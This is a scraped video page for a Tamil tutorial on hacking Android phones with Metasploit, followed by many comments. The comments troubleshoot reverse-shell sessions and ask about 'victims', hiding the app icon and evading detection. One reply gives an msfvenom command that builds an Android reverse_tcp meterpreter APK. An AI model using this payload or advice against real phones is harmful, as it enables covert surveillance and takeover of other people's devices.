HOW TO ACCESS THE ANDROID REMOTELY USING METASPLOIT | HOW TO HACK ANDROID IN TAMIL

Поділитися
Вставка
  • Опубліковано 15 жов 2024
  • THIS CONTENT IS ONLY FOR EDUCATIONAL PURPOSE.
    EPISODE :1
    • Basic concepts of Netw...
    Special Thanks to Adithyan Ak , Security Researcher
    LinkedIn profile : / akinfosec
    HOW TO HACK ANDROID IN TAMIL.
    HOW TO ACCESS THE ANDROID REMOTELY.
    HACK WITH METASPLOIT.

КОМЕНТАРІ • 163

  • @vijaysri616
    @vijaysri616 3 роки тому +6

    Bro,am interested to learn from u about linux and ethical hack, could you teach?
    Do u have any coaching center?

  • @timeforentertainment7492
    @timeforentertainment7492 2 роки тому +2

    bro im using metasploit over 2 years (kali 2018.1 to kali 2021.2) but now in 2021.3 i ran msfupdate and i generated a payload of size 10194 bytes for android machine , but i can't able to communicate with that payload. that is, session is not activating after the exploit command but i successfully injected the payload in that android machine. any solution ? puriythu romba naalaikku munadi pota video la doubt kekuren 😂 sorry free na sollunga plz.

  • @_jesniha_
    @_jesniha_ 3 роки тому +8

    bro neenga sonna mathiri senjan unmayilayea hack aahiduchu...but epdi victim a release panrathu?

    • @rajendiranm2182
      @rajendiranm2182 2 роки тому +1

      Bro.. Enaku apk file epdi host panrathu nu solli thanga bro

    • @Manikandan-gv1eh
      @Manikandan-gv1eh 2 роки тому +2

      @Brain of heart unmiya ba bro

    • @_jesniha_
      @_jesniha_ 2 роки тому

      @@Manikandan-gv1eh yeah, but i'm using linux now
      you can also try linux, it's not a big matter
      ua-cam.com/channels/G5rr3EXEIGp9vR46328UJQ.html I teaching hacking in that channel

  • @prasanthfs6133
    @prasanthfs6133 9 місяців тому

    Bro once nambha access eduthu mudichittu veliya vanthutta marubhadium antha app ha vachi access edukka mudiuma

  • @sudharsand9034
    @sudharsand9034 2 роки тому +1

    Bro, curl use panni file send panna pudiyala. Vera step irunda solluga

  • @sanjaisanjai522
    @sanjaisanjai522 3 роки тому +1

    Bro Xiaomi mobile
    Automatic ha payload scan aguthu bro
    How to hack highly protect mobile la

  • @praveenkrishnak7899
    @praveenkrishnak7899 3 роки тому +1

    bro once victim was hacked.... can I re-open that session again... pls give me a solution bro... and ip address ah epdi static ah vaikirathu.....

  • @ShamPrasanthG
    @ShamPrasanthG 2 місяці тому

    bro curl tool use pannum pothu upload aaga mattuthu bro...could not save metadata nu varuthu bro...plzz bro edhum solution sollu bro...although wifi mattum than use panni itha panna mudiyumo broo..i think.anyway plzz tell solution bro

  • @santhoshsanthoshcsk7136
    @santhoshsanthoshcsk7136 3 роки тому +1

    Bro hack anathu la iruthu eppadi bro realise agakurathu antha app pa un install panita relise airuma bro

  • @blackbabboonstudios5546
    @blackbabboonstudios5546 2 роки тому

    How to install metasploit in Android 7.1.1 nougat (not root) in Termux ...... meterpreter session closed reason died not valid nu varuduu bro...

  • @Manoj-sy9ky
    @Manoj-sy9ky 2 роки тому +1

    I want learn ethical hacking beginner to advance level bro ❤️
    How to learn bro❤️
    Any Suggestion

  • @kkarthick5440
    @kkarthick5440 2 роки тому

    Hi ... Very nice... How to install and use ngrok tool... ?

  • @sathishg450
    @sathishg450 2 роки тому

    Oru time victim phone apk install panita epo venalum remote access pana mudiuma

  • @keerthivasan3368
    @keerthivasan3368 3 роки тому +1

    What if victim uninstall app connection will be denied.so is there any other way apart from creating apk file?

  • @deepsea2238
    @deepsea2238 3 роки тому +1

    link la ipo yarum open pandradhu illa ushar.vera techi
    nique sollunga bro

  • @chandrubala5963
    @chandrubala5963 5 місяців тому

    Link varala bro athukku pathila Could not save metadata'nu varuthu bro??? Itha eppadi bro solve pandrathu??

  • @baskerbakser1784
    @baskerbakser1784 2 роки тому

    Bro what's app massage paka command enna illave illa bro eppdi paknum social media lam

  • @aspirant80
    @aspirant80 3 роки тому

    Bro, metasploit use panura apo
    Proxychain , tor active pannanuma

  • @aruvasagan
    @aruvasagan Рік тому

    Bro pls help me bro, meterpreter session not acces bro that's why...

  • @shailesh5106
    @shailesh5106 6 місяців тому

    bro curl la link generated agum both error varathu bro

  • @SureshKumar-ho3sv
    @SureshKumar-ho3sv 3 роки тому +1

    Bro, It is worked for local network.
    But, how to work with wide area network.
    Please tell me bro. Thank You

  • @darkmix4192
    @darkmix4192 Рік тому

    Bro, how to change the region in ngrok...pls explain

  • @newuser8548
    @newuser8548 2 роки тому +2

    Bro curl - could not resolve host : transfer.sh nu varuthu bro ..!! How to fix it

    • @vrajan9406
      @vrajan9406 Рік тому

      Bro i think so u have the same name for the apk file . I too did that and got same error and after that I changed the name i got a good result

    • @yoyoyogee459
      @yoyoyogee459 Місяць тому

      Which is best word please tell me ​@@vrajan9406

  • @nishanthm6563
    @nishanthm6563 2 роки тому +3

    bro ithula curl use pannum pothu error varuthu bro

    • @ShamPrasanthG
      @ShamPrasanthG 2 місяці тому

      bro aama bro...could not save metadata nu varuthu bro...edhum solution irukka bro

  • @lovebeatsvfx
    @lovebeatsvfx 3 роки тому

    Pentestbox namba download pannanuma bro.. Ellana windows lae erukuma... Pestestbox pathi full video poduga bro

  • @jayashreeshree6013
    @jayashreeshree6013 3 роки тому +1

    Bro now a days Android versions has been updated payloads not working.plz advice...any other ways or tools for updated versions....

    • @badravi_2005
      @badravi_2005 9 місяців тому

      msfvenom -p android/meterpreter/reverse_tcp LHOST=localhost LPORT=4444 -o anti.apk

  • @chandrudeee3802
    @chandrudeee3802 3 місяці тому

    Hi bro, I have some doubt can you clear?

  • @arjundas9391
    @arjundas9391 3 роки тому

    Bro, ellam work aagudhu bro... But, command window va close pannita, marubadiyum modhala irundhu type pannanuma? I mean msfconsole la irundhu?...
    Aprom innoru doubt bro, andha virus 2,3 mobile la irundhuchuna epdi endha use pandradhu? I mean multiple mobiles la...

  • @iicse311rameshb2
    @iicse311rameshb2 3 роки тому +1

    Bro android hack pannidu irukumpothu oru ip kuduthu meterpreter session 3closed. Reason: Died ipdi varuthu y?

    • @jasminenisha8253
      @jasminenisha8253 3 роки тому

      Patch pannitanga,I'll not work more than 2 or 3 minutes ...(vera method iruku bro).

    • @iicse311rameshb2
      @iicse311rameshb2 3 роки тому

      @@jasminenisha8253tks for u r responsibility.Vera method iruntha sollunga bro

  • @edwardraj8663
    @edwardraj8663 3 роки тому +1

    It's working bro thanks bro
    I love you bro

  • @thisanth_pathmanathan8688
    @thisanth_pathmanathan8688 3 роки тому

    anna enaku oru dought ippa nama link la irukura apk ah download panithu atha victim uku send panna work akuma anna

  • @MELE-Siddharth
    @MELE-Siddharth 3 роки тому +1

    Bro link not generating in termux app please let me know bro

  • @prithvisaravanabawan612
    @prithvisaravanabawan612 3 роки тому

    Bro, anda app ah install nu kudutha main activity la irundhu app blocked nu varudu bro. App ah undetectable aaka ennamaadu vali irukka?

  • @lovebeatsvfx
    @lovebeatsvfx 3 роки тому +1

    Bro appo antha apk avaga delete pannitta control panna mudiyatha bro

    • @killerbotmr1346
      @killerbotmr1346 3 роки тому +1

      Icon hide pannuna, delete eh panna mudiyathu bro

    • @lovebeatsvfx
      @lovebeatsvfx 3 роки тому

      @@killerbotmr1346 ok thank u bro ❤

  • @manikandanmokkasamy2627
    @manikandanmokkasamy2627 Рік тому

    brother please tell again that file transfer through curl command by details

  •  3 роки тому

    Bro once victim data off panita marubadiyum firstla irunthu pannanuma?
    Antha malware install panrathu ellamey.

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому

      Ila bro , Nama internet connection stable ah irundha podhum if victim data off panita thirumba epo data on panrano apo namaku connection vanthrum

    •  3 роки тому

      @@HackerVlogs012 athu reverse tcp athunaala apdi kidaikumnu solringa. Namma data off pani on pannuna ip address change aagumla because namaku static ip ila apa enna panrathu?

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому

      @ Bro Nama connection cut aachuna thirumbi first la irundhu pananum, adhaan sonen nama connection must be stable.

    • @nogoodhacker6944
      @nogoodhacker6944 3 роки тому

      @@HackerVlogs012 bro external ip vachi exploit pani kamikuringala please??

  • @adamrocks1080
    @adamrocks1080 3 роки тому +2

    Working Bro Thank You

  • @postbox-gy5xq
    @postbox-gy5xq 3 роки тому

    Bro tq for the video first.!❤️ ennaku handler start agauthu device uhm app install panna vunna meterpreter session 1 opened nu varuthu.. then command kodukum pothu session closed reason died nu varuthu..Ethunala bro ithu.?

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому +2

      Metasploit ah upgrade pani paarunga bro!

    • @postbox-gy5xq
      @postbox-gy5xq 3 роки тому +1

      Pentestbox with metasploit than bro en kitta iruku... athum full ahh ah delete panni thirumba download panni install panni pathutan bro... v 2.3 .. still apdiyea than varuthu .. help me bro.!🌀

    • @richievellalar3214
      @richievellalar3214 3 роки тому

      @@HackerVlogs012 you cannot install the apk on new android phone because it says ( you are using older version of android version )

  • @mrdevil7299
    @mrdevil7299 3 роки тому

    bro prntest box use pannura system problem illa hack agadhaaa

  • @vvv5848
    @vvv5848 2 роки тому

    Sir how to uninstall this which hacked by my phone

  • @dhanushkodi.g3445
    @dhanushkodi.g3445 3 роки тому +1

    Bro metasplot use pandradhuku net mukiyam ma bro konju sollunga bro❓❓

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому

      Yes bro ! Internet is important....

    • @ravi_meow
      @ravi_meow 3 роки тому +2

      Yaaruya Nee. Romba Mukiyam

    • @networksecurity778
      @networksecurity778 3 роки тому

      @@ravi_meow bro இடதுக்கு சம்பந்தமில்லாதவரு போல இவரு.குக்கிங் செனல் பார்க்க வேண்டிய நபரு

  • @kevinr1510
    @kevinr1510 3 роки тому

    Super bro vera level supera workakuthu

  • @SharaffAhamed
    @SharaffAhamed 3 роки тому

    bro pentest teb close ana
    victim link a click pannina naamakku notification yethavethu varuma ????

  • @SmashMukesh
    @SmashMukesh 3 роки тому

    android/apk/classes.dex not found ERROR WHILE MAKING APK

  • @dhanushkodi.g3445
    @dhanushkodi.g3445 3 роки тому +3

    Bro how to install metasplot bro antha app yevalu mb bro?

  • @vrchangers5299
    @vrchangers5299 Рік тому

    Super bro

  • @kevinr1510
    @kevinr1510 3 роки тому

    namba again andrioda hack pannaumna bestla erunthu seiyanuma bro

  • @janushankar3039
    @janushankar3039 Рік тому

    Bro that malware file is not opening bro

  • @saurabhpal6339
    @saurabhpal6339 Рік тому

    Tapan Vai, what about Android Hacking in Hindi

  • @nogoodhacker6944
    @nogoodhacker6944 3 роки тому +1

    Bro external ip vachi panna port forwarding must dhaana?
    Enaku port forwarding theriyadhu, apdiye port forwarding konjam epdi msfconsole la pani exploit nu oru video.podunga pls bro!

    • @StudyWithDropper
      @StudyWithDropper 3 роки тому

      Illi pode illi pode hardam arammbh tumhabh rohitam pandeyam

  • @edwardraj8663
    @edwardraj8663 3 роки тому +2

    Bro link use panni yapadi bro hack pantrathu video poduka bro please

  • @MrPrabuutube
    @MrPrabuutube Рік тому

    Tried in my phone.. it's not installing

  • @amudhand9495
    @amudhand9495 2 роки тому

    Bro eppadi ngrok assign panna link vanganum

  • @jaikumar927
    @jaikumar927 3 роки тому

    Bro Chennai ethical hack training where

  • @dhanapalm6063
    @dhanapalm6063 3 роки тому

    Very nice

  • @thisanth_pathmanathan8688
    @thisanth_pathmanathan8688 3 роки тому

    nice work bro

  • @kevinr1510
    @kevinr1510 3 роки тому

    Curl upoload file not work bro

  • @thamizhandigitalarts.1444
    @thamizhandigitalarts.1444 3 роки тому

    BRO DIFFERENT WIFI LA CONNECT ANA MOBILE EPDI HACK PANRADHU

  • @harisheditz9158
    @harisheditz9158 3 роки тому

    Bro antha ngrok public address athula podanu

  • @hollvoode.eainglissongs7335
    @hollvoode.eainglissongs7335 3 роки тому

    Bro. Blackarcy Linux. Pati. Veadio Podunk. Bro

  • @mrdevil7299
    @mrdevil7299 3 роки тому

    bro msf coomand work pannudhu illa enna plm

  • @mi_coder786
    @mi_coder786 3 роки тому

    Elama OK bro but sessions matum close aagiduthu athuku oru vali soluga......

  • @ragavvignesv1726
    @ragavvignesv1726 3 роки тому

    Bro konjam nerathuku apram session stop aairuthu bro

  • @Hasan-Ali799
    @Hasan-Ali799 3 роки тому +1

    Ngrok how to install

  • @kottai_g213
    @kottai_g213 3 роки тому

    How to contact bro you...

  • @johnedith4313
    @johnedith4313 3 роки тому

    Bro I want to learn Ethical hacking.Could you help for me?

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому

      Yeah❤️

    • @johnedith4313
      @johnedith4313 3 роки тому

      @@HackerVlogs012 Thank You Brother.But I want to learn fundamental of ethical hacking and I need your Contact number.Please teach me Brother and I'm waiting for your reply

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому +1

      @@johnedith4313 contacte me at ramthewhitehat@gmail.com

    • @justforfun1222
      @justforfun1222 2 роки тому

      @@HackerVlogs012 not respond this email please share your contact number

  • @TodeDef
    @TodeDef 3 роки тому

    Course ethachu irukka bro

  • @trendingvideoz87
    @trendingvideoz87 2 роки тому

    Curl wrk aagula bro

  • @gobinathb5076
    @gobinathb5076 3 роки тому +2

    Bruh command ah description la podu bruh

    • @jaikumar927
      @jaikumar927 3 роки тому

      Bro hacking teach panungha

  • @harisheditz9158
    @harisheditz9158 3 роки тому

    Public address epdi adukurathu

  • @dineshk2173
    @dineshk2173 3 роки тому

    Exploit kudukura apo unknown command nu varudhu

  • @Kingdomholidays
    @Kingdomholidays 3 роки тому

    Bro Ngrok Eapadi Install Pannurathunu Sollunga Bro

  • @saistech5458
    @saistech5458 2 роки тому

    What os bro

  • @krish_editz9802
    @krish_editz9802 2 роки тому

    Bro enaku starting stage la irruku bro

  • @BILLIONAIRE_KARTHI_KEYAN
    @BILLIONAIRE_KARTHI_KEYAN Рік тому

    Bro invalid payload katturu

  • @Wayfarer-xz1vn
    @Wayfarer-xz1vn 2 роки тому

    File upload aga matikthu

  • @dave6545
    @dave6545 3 роки тому

    Bro idhuku net thevaiya

  • @kevinr1510
    @kevinr1510 3 роки тому

    Link upload panna mutiyala bro

  • @Gameingchannel688
    @Gameingchannel688 2 роки тому

    How to access iphone remotely

  • @kgf3608
    @kgf3608 2 роки тому

    Bro instgram hacking podugo bro

  • @sabapathis3958
    @sabapathis3958 3 роки тому

    bro bug bountry pathi solunga

  • @mohammednasar5812
    @mohammednasar5812 2 роки тому

    Bro please i need one help bro

  • @jskingoflifecreatebyjstami2973
    @jskingoflifecreatebyjstami2973 3 роки тому

    Kali Linux la use pannan

  • @Hasan-Ali799
    @Hasan-Ali799 3 роки тому +1

    Hello

  • @blackt2514
    @blackt2514 3 роки тому

    bro anda antivirus apk va neenga eppadi upload pandrienga nu theriyala

    • @HackerVlogs012
      @HackerVlogs012  3 роки тому +5

      Bro , neenga adha direct ah andha website la poitum upload panalam...
      Idhula curl command use pani direct ah request make pani upload panirpom...
      Hope u understood❤️

  • @ayyappanmani7669
    @ayyappanmani7669 3 роки тому

    Onnum purila bro

  • @jskingoflifecreatebyjstami2973
    @jskingoflifecreatebyjstami2973 3 роки тому

    Payload error varathu bro

  • @yuvarajkumar5733
    @yuvarajkumar5733 3 роки тому

    Can you read what's up chats using this method

  • @openhearterofficial5887
    @openhearterofficial5887 3 роки тому

    Bro unga whatsapp num kudunga bro enakku unga kitta hacking pathi kekkanum bro plz response pannunga

  • @baskerbakser1784
    @baskerbakser1784 2 роки тому

    Bro

  • @thalapathithalapathi2987
    @thalapathithalapathi2987 2 роки тому

    metasploit android hacking in tamil

  • @saistech5458
    @saistech5458 2 роки тому

    What is bro

  • @Santhosh-1217
    @Santhosh-1217 3 роки тому

    Bro na virtual box la linux install pannirukea
    Ip address windows la paakanuma
    Illa linux la paakanuma

  • @allenstains.g.p6836
    @allenstains.g.p6836 3 роки тому

    Bro ngrok la ip address 0.0.0 tha kudukanuma illana nama ip address sa

  • @mrdevil7299
    @mrdevil7299 3 роки тому

    bro ngrok work pannudhu illa bro

  • @mrdevil7299
    @mrdevil7299 3 роки тому

    bro